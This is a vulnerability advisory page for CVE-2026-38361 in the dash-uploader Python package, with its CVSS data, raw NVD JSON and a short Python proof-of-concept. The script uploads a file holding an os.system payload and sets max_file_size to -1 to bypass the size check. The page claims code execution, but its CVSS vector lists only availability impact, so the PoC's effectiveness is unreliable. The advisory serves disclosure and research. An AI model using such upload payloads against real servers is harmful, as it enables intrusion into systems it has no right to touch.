Security Vulnerability Report
CVE-2026-38361 CVSS 7.5 HIGH

Published: 2026-05-08 15:16:37
Last Modified: 2026-05-08 19:16:31

Description

An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py in the Upload function and max_file_size parameter, dash_uploader/configure_upload.py components.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

fohrloop dash-uploader v0.1.0 through v0.7.0a2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Example)
target = "http://127.0.0.1:8050/_dash-uploader"

# Malicious file to upload
payload_content = "__import__('os').system('calc.exe')"
files = {
    'file': ('exploit.py', payload_content, 'application/octet-stream')
}

# Exploit the max_file_size parameter validation issue
data = {
    'max_file_size': -1,  # Attempt to bypass size check
    'uploadId': 'CVE-2026-38361-test'
}

try:
    response = requests.post(target, files=files, data=data)
    if response.status_code == 200:
        print("[+] Potential exploit successful, check server.")
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38361", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:37.120", "lastModified": "2026-05-08T19:16:31.103", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py in the Upload function and max_file_size parameter, dash_uploader/configure_upload.py components"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-670"}]}], "references": [{"url": "https://docs.python.org/3/library/functions.html#all", "source": "[email protected]"}, {"url": "https://github.com/a1ohadance/CVE-2026-38361", "source": "[email protected]"}, {"url": "https://github.com/fohrloop/dash-uploader", "source": "[email protected]"}, {"url": "https://github.com/fohrloop/dash-uploader/blob/stable/dash_uploader/httprequesthandler.py", "source": "[email protected]"}, {"url": "https://github.com/fohrloop/dash-uploader/issues/153", "source": "[email protected]"}, {"url": "https://libraries.io/pypi/dash-uploader", "source": "[email protected]"}, {"url": "https://pepy.tech/project/dash-uploader", "source": "[email protected]"}, {"url": "https://pypi.org/project/dash-uploader/", "source": "[email protected]"}, {"url": 
"https://pypistats.org/packages/dash-uploader", "source": "[email protected]"}, {"url": "https://github.com/a1ohadance/CVE-2026-38361", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}